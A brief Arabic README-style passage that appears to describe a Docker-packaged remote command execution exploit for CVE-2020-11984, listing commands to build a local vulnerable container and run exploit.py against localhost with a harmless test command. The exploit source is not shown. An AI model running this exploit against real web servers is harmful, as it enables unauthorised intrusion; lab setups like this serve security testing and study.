
استغلال معبأ في Docker لـ CVE-2020-11984 يتيح تنفيذ الأوامر عن بُعد على خوادم الويب الضعيفة عبر حمولة قائمة على بايثون.
docker build --no-cache -t cve-2020-11984 .
docker run --rm -it -p 8080:80 --name cve-2020-11984 cve-2020-11984
pipenv run python3 exploit.py -u localhost:8080/ -c "echo 111>/tmp/abc"
https://github.com/RubenBar/MLW-upcrans/